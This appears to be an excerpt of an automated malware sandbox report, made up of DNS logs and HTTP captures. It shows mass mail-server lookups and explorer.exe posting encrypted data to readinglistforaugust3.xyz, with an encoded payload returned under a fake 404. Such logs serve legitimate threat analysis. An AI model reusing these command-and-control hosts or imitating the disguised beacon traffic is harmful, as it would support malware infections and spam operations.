Aug 24, 2021 08:50:55.831067085 CEST	8.8.8.8	192.168.2.5	0xe672	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.854901075 CEST	8.8.8.8	192.168.2.5	0x13b5	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.143467903 CEST	8.8.8.8	192.168.2.5	0x6bc1	No error (0)	live-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.143467903 CEST	8.8.8.8	192.168.2.5	0x6bc1	No error (0)	live-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.194896936 CEST	8.8.8.8	192.168.2.5	0xa266	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.194976091 CEST	8.8.8.8	192.168.2.5	0x9522	No error (0)	eur.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.194976091 CEST	8.8.8.8	192.168.2.5	0x9522	No error (0)	eur.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.462121010 CEST	8.8.8.8	192.168.2.5	0x7878	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.462121010 CEST	8.8.8.8	192.168.2.5	0x7878	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.507987022 CEST	8.8.8.8	192.168.2.5	0x8854	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.558306932 CEST	8.8.8.8	192.168.2.5	0x3d52	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.607177019 CEST	8.8.8.8	192.168.2.5	0xd449	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.667645931 CEST	8.8.8.8	192.168.2.5	0x1e84	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.748074055 CEST	8.8.8.8	192.168.2.5	0x234e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.748074055 CEST	8.8.8.8	192.168.2.5	0x234e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.755656004 CEST	8.8.8.8	192.168.2.5	0x3058	No error (0)	outlook-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.755656004 CEST	8.8.8.8	192.168.2.5	0x3058	No error (0)	outlook-com.olc.protection.outlook.com		104.47.58.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.779699087 CEST	8.8.8.8	192.168.2.5	0x22b9	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.847137928 CEST	8.8.8.8	192.168.2.5	0x3d1c	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.910758972 CEST	8.8.8.8	192.168.2.5	0xfb87	No error (0)	ocps.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:56.910758972 CEST	8.8.8.8	192.168.2.5	0xfb87	No error (0)	ocps.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:57.017473936 CEST	8.8.8.8	192.168.2.5	0x9765	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.121022940 CEST	8.8.8.8	192.168.2.5	0x17ab	No error (0)	mx1.ocps.net.gslb.pphosted.com		67.231.144.32	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.132987022 CEST	8.8.8.8	192.168.2.5	0xca5d	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.199059963 CEST	8.8.8.8	192.168.2.5	0x495f	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.300460100 CEST	8.8.8.8	192.168.2.5	0x14bc	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.364624977 CEST	8.8.8.8	192.168.2.5	0x23f2	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.383975029 CEST	8.8.8.8	192.168.2.5	0x59e1	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.383975029 CEST	8.8.8.8	192.168.2.5	0x59e1	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.436444044 CEST	8.8.8.8	192.168.2.5	0x4cd2	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.477695942 CEST	8.8.8.8	192.168.2.5	0xbf37	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.521569967 CEST	8.8.8.8	192.168.2.5	0x5ea7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.521569967 CEST	8.8.8.8	192.168.2.5	0x5ea7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.803617954 CEST	8.8.8.8	192.168.2.5	0x45f4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.803617954 CEST	8.8.8.8	192.168.2.5	0x45f4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.827342987 CEST	8.8.8.8	192.168.2.5	0x324a	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.150616884 CEST	8.8.8.8	192.168.2.5	0xb450	No error (0)	outlook-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.150616884 CEST	8.8.8.8	192.168.2.5	0xb450	No error (0)	outlook-com.olc.protection.outlook.com		104.47.58.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.158691883 CEST	8.8.8.8	192.168.2.5	0x20b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.158691883 CEST	8.8.8.8	192.168.2.5	0x20b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.528125048 CEST	8.8.8.8	192.168.2.5	0x2082	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.528125048 CEST	8.8.8.8	192.168.2.5	0x2082	No error (0)	eur.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.806608915 CEST	8.8.8.8	192.168.2.5	0x7bf2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.806608915 CEST	8.8.8.8	192.168.2.5	0x7bf2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.996463060 CEST	8.8.8.8	192.168.2.5	0xf900	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.996463060 CEST	8.8.8.8	192.168.2.5	0xf900	No error (0)	eur.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.093728065 CEST	8.8.8.8	192.168.2.5	0xdb24	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.093728065 CEST	8.8.8.8	192.168.2.5	0xdb24	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.135019064 CEST	8.8.8.8	192.168.2.5	0xa59a	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.217012882 CEST	8.8.8.8	192.168.2.5	0xb3c6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.217012882 CEST	8.8.8.8	192.168.2.5	0xb3c6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.407733917 CEST	8.8.8.8	192.168.2.5	0xef25	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.407733917 CEST	8.8.8.8	192.168.2.5	0xef25	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.584343910 CEST	8.8.8.8	192.168.2.5	0x3665	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.686464071 CEST	8.8.8.8	192.168.2.5	0x7d7a	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.746121883 CEST	8.8.8.8	192.168.2.5	0xde63	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.833568096 CEST	8.8.8.8	192.168.2.5	0x59e4	No error (0)	mx1.ocps.net.gslb.pphosted.com		67.231.144.32	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.971043110 CEST	8.8.8.8	192.168.2.5	0x64b2	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.339749098 CEST	8.8.8.8	192.168.2.5	0xf522	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.339749098 CEST	8.8.8.8	192.168.2.5	0xf522	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.495810986 CEST	8.8.8.8	192.168.2.5	0x5c11	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.691288948 CEST	8.8.8.8	192.168.2.5	0x983e	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.757822037 CEST	8.8.8.8	192.168.2.5	0xdd30	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.757822037 CEST	8.8.8.8	192.168.2.5	0xdd30	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.874025106 CEST	8.8.8.8	192.168.2.5	0x1df7	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.956497908 CEST	8.8.8.8	192.168.2.5	0x3528	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:01.113245964 CEST	8.8.8.8	192.168.2.5	0xc235	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:01.813704967 CEST	8.8.8.8	192.168.2.5	0x5aec	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:02.327334881 CEST	8.8.8.8	192.168.2.5	0xa442	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:02.384479046 CEST	8.8.8.8	192.168.2.5	0xbcc9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:02.384479046 CEST	8.8.8.8	192.168.2.5	0xbcc9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.519567966 CEST	8.8.8.8	192.168.2.5	0x3f23	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.559459925 CEST	8.8.8.8	192.168.2.5	0xbcc9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.559459925 CEST	8.8.8.8	192.168.2.5	0xbcc9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.568056107 CEST	8.8.8.8	192.168.2.5	0x4d2b	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.756288052 CEST	8.8.8.8	192.168.2.5	0xcf20	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.825023890 CEST	8.8.8.8	192.168.2.5	0x5ab6	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.872401953 CEST	8.8.8.8	192.168.2.5	0xadd1	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.920063019 CEST	8.8.8.8	192.168.2.5	0xe4fb	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.984091997 CEST	8.8.8.8	192.168.2.5	0x8f24	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:05.554224014 CEST	8.8.8.8	192.168.2.5	0xe4b	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:05.621459007 CEST	8.8.8.8	192.168.2.5	0x4fcf	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:05.825220108 CEST	8.8.8.8	192.168.2.5	0x67bb	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:05.901695013 CEST	8.8.8.8	192.168.2.5	0xec8c	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.115955114 CEST	8.8.8.8	192.168.2.5	0xea92	No error (0)	stargateworld.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:06.132287025 CEST	8.8.8.8	192.168.2.5	0x4e7c	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.171077967 CEST	8.8.8.8	192.168.2.5	0x507b	No error (0)	mx156.hostedmxserver.com		68.183.127.86	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.171077967 CEST	8.8.8.8	192.168.2.5	0x507b	No error (0)	mx156.hostedmxserver.com		143.198.175.12	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.171077967 CEST	8.8.8.8	192.168.2.5	0x507b	No error (0)	mx156.hostedmxserver.com		157.230.233.4	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.171077967 CEST	8.8.8.8	192.168.2.5	0x507b	No error (0)	mx156.hostedmxserver.com		37.139.4.171	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.171077967 CEST	8.8.8.8	192.168.2.5	0x507b	No error (0)	mx156.hostedmxserver.com		37.139.4.118	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.171077967 CEST	8.8.8.8	192.168.2.5	0x507b	No error (0)	mx156.hostedmxserver.com		134.209.79.108	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.171077967 CEST	8.8.8.8	192.168.2.5	0x507b	No error (0)	mx156.hostedmxserver.com		37.139.4.134	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.171077967 CEST	8.8.8.8	192.168.2.5	0x507b	No error (0)	mx156.hostedmxserver.com		37.139.4.163	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.196222067 CEST	8.8.8.8	192.168.2.5	0x4094	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.234589100 CEST	8.8.8.8	192.168.2.5	0x7890	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.306971073 CEST	8.8.8.8	192.168.2.5	0x61d0	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.463135004 CEST	8.8.8.8	192.168.2.5	0x9058	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.549384117 CEST	8.8.8.8	192.168.2.5	0xd7a9	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.892138958 CEST	8.8.8.8	192.168.2.5	0x2f11	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.079912901 CEST	8.8.8.8	192.168.2.5	0xf8fc	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.180056095 CEST	8.8.8.8	192.168.2.5	0x736b	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.265918016 CEST	8.8.8.8	192.168.2.5	0x19d7	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.472501993 CEST	8.8.8.8	192.168.2.5	0x387c	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.519170046 CEST	8.8.8.8	192.168.2.5	0x98eb	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.581084013 CEST	8.8.8.8	192.168.2.5	0x6350	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.630269051 CEST	8.8.8.8	192.168.2.5	0x1b9f	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.850053072 CEST	8.8.8.8	192.168.2.5	0x6182	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.926480055 CEST	8.8.8.8	192.168.2.5	0x9779	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.988867044 CEST	8.8.8.8	192.168.2.5	0x4e49	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.051762104 CEST	8.8.8.8	192.168.2.5	0x8681	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.109747887 CEST	8.8.8.8	192.168.2.5	0xdd75	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.194772005 CEST	8.8.8.8	192.168.2.5	0x843c	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.236553907 CEST	8.8.8.8	192.168.2.5	0x7755	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.336667061 CEST	8.8.8.8	192.168.2.5	0xaded	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.907262087 CEST	8.8.8.8	192.168.2.5	0x6b5f	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.020910025 CEST	8.8.8.8	192.168.2.5	0x90b3	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.179106951 CEST	8.8.8.8	192.168.2.5	0x613c	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.182276964 CEST	8.8.8.8	192.168.2.5	0xa806	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.253112078 CEST	8.8.8.8	192.168.2.5	0xd396	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.656040907 CEST	8.8.8.8	192.168.2.5	0x3597	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.722670078 CEST	8.8.8.8	192.168.2.5	0xe0ea	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.167727947 CEST	8.8.8.8	192.168.2.5	0x853	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.231873989 CEST	8.8.8.8	192.168.2.5	0x8fc3	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.307293892 CEST	8.8.8.8	192.168.2.5	0xebb2	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.361743927 CEST	8.8.8.8	192.168.2.5	0x5c71	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.414093971 CEST	8.8.8.8	192.168.2.5	0x100c	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.472664118 CEST	8.8.8.8	192.168.2.5	0x6d2	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.588682890 CEST	8.8.8.8	192.168.2.5	0x3a1e	No error (0)	doctor.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:10.588682890 CEST	8.8.8.8	192.168.2.5	0x3a1e	No error (0)	doctor.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:10.668009043 CEST	8.8.8.8	192.168.2.5	0xffe2	No error (0)	mx00.mail.com		74.208.5.20	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.742666960 CEST	8.8.8.8	192.168.2.5	0xa4e3	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.789047956 CEST	8.8.8.8	192.168.2.5	0x2ccb	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.826589108 CEST	8.8.8.8	192.168.2.5	0xb039	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.868593931 CEST	8.8.8.8	192.168.2.5	0x4995	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:11.064941883 CEST	8.8.8.8	192.168.2.5	0x8aae	No error (0)	gorodok.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:11.153785944 CEST	8.8.8.8	192.168.2.5	0x1e9	No error (0)	mx.gorodok.net	gorodok.net		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:51:11.153785944 CEST	8.8.8.8	192.168.2.5	0x1e9	No error (0)	gorodok.net		5.128.82.36	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:11.779860973 CEST	8.8.8.8	192.168.2.5	0xde43	No error (0)	smtp.yopmail.com		87.98.164.155	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:12.034807920 CEST	8.8.8.8	192.168.2.5	0xfce9	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:12.904176950 CEST	8.8.8.8	192.168.2.5	0x4c30	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.251679897 CEST	8.8.8.8	192.168.2.5	0xdb6e	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.612574100 CEST	8.8.8.8	192.168.2.5	0x9032	No error (0)	hongkong.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		34.212.139.205	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		34.220.245.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		34.212.36.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		34.223.6.127	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		54.187.110.113	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		18.237.235.220	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		54.200.93.251	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		34.222.93.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		54.190.26.211	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.702687979 CEST	8.8.8.8	192.168.2.5	0x86b6	No error (0)	mail.mailerhost.net		54.244.49.115	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

readinglistforaugust3.xyz

swretjhwrtj.gq

188.34.200.103

185.49.70.90:2080

188.119.112.104

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49712	212.224.105.79	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:49:11.475729942 CEST	1136	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:11.475745916 CEST	1136	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 85 1c 21 bc d5 4a 98 47 ba bf 87 ef c7 7b Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q!JG{uSVu<3"5B;&NF5T+OQ%OjuF)jg~)5gkV].bH3%SMu
Aug 24, 2021 08:49:11.557883024 CEST	1138	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 19 00 00 00 0f ca 2f 84 77 38 03 07 60 d2 80 a2 bd 69 d9 2a 54 11 f9 3f 11 11 69 c6 03 00 ca e6 04 00 01 d0 ea 5b 01 07 01 00 09 00 9c 03 00 00 9f 24 2b 84 9b 15 0f 1b 8d 31 3e 1f 89 00 1a 00 9a 9e 36 eb 35 c6 1f 1b 28 74 b4 ea e8 ba a8 25 a8 83 82 1b 73 98 df ea a8 d4 7e 16 a7 ef 2c 3e c2 32 14 ea be ef 24 3e 44 3a 13 90 7d 7e 96 3b 32 55 c2 af b2 7b 11 87 ff 09 93 b8 0e 89 4b 95 cb 9a bb 7e 96 48 44 e1 80 c2 33 8f c5 d0 d9 53 6d 17 df f2 e8 40 70 c8 8c 5b a2 7d 08 fb 77 ac b1 da 74 68 df 2b 53 27 b4 4d 72 56 b6 6f 03 90 e0 b7 2e bd 97 54 51 d0 24 c3 4a ff 42 97 9f a3 7e 79 5d 43 0d c5 83 80 6a 74 a6 9b 8d 69 d5 01 98 3e 25 7d c0 5c 60 26 0e 9f 7d 03 0a f7 f8 bd 9a 54 e0 ee 28 f7 34 f4 2f d0 8c 1e 0c 81 10 65 a1 bd 57 6f a5 98 bb b7 84 ef a1 b2 95 45 71 c2 0e c2 db ce de df 0d 32 48 57 a1 05 14 7e e4 f3 6d 49 73 a4 95 73 72 7e 2f 8c 8d df bc ae af 30 1b ae 49 95 a1 e1 82 bf c9 5c 5c 1e ea ec be 4a 0e 4d 26 50 4d a1 0f 25 77 b9 78 a7 a3 e4 48 f3 77 68 be 20 f2 7f b2 8b 88 bb 1f a1 28 57 50 e1 f4 60 cb 93 bf 5a 5e 7f 5d 54 b6 04 a6 3f fd 8a 05 83 18 e7 4c 8e d0 16 e2 c2 c8 9c e0 de 7c 62 9d fc 80 0b 82 d3 1a 9a b7 3d 67 c1 c7 09 b0 da 98 f4 df a6 e2 bf 34 64 06 bd cc 4b 23 5d b2 f6 90 1a 5e 08 07 8b e1 b4 d7 b1 87 4f 0a 